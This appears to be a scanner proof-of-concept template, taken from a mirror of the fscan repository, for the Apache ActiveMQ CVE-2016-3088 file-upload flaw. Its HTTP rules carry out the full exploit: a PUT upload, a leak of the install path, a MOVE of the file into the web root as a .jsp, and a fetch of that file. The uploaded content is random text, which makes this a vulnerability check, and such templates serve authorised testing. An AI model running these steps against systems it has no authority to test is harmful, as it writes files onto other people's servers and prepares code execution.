mirror of https://github.com/qwqdanchun/fscan.git
35 lines
942 B
YAML
35 lines
942 B
YAML
name: poc-yaml-activemq-cve-2016-3088
|
|
set:
|
|
filename: randomLowercase(6)
|
|
fileContent: randomLowercase(6)
|
|
rules:
|
|
- method: PUT
|
|
path: /fileserver/{{filename}}.txt
|
|
body: |
|
|
{{fileContent}}
|
|
expression: |
|
|
response.status == 204
|
|
- method: GET
|
|
path: /admin/test/index.jsp
|
|
search: |
|
|
activemq.home=(?P<home>.*?),
|
|
follow_redirects: false
|
|
expression: |
|
|
response.status == 200
|
|
- method: MOVE
|
|
path: /fileserver/{{filename}}.txt
|
|
headers:
|
|
Destination: "file://{{home}}/webapps/api/{{filename}}.jsp"
|
|
follow_redirects: false
|
|
expression: |
|
|
response.status == 204
|
|
- method: GET
|
|
path: /api/{{filename}}.jsp
|
|
follow_redirects: false
|
|
expression: |
|
|
response.status == 200 && response.body.bcontains(bytes(fileContent))
|
|
detail:
|
|
author: j4ckzh0u(https://github.com/j4ckzh0u)
|
|
links:
|
|
- https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2016-3088
|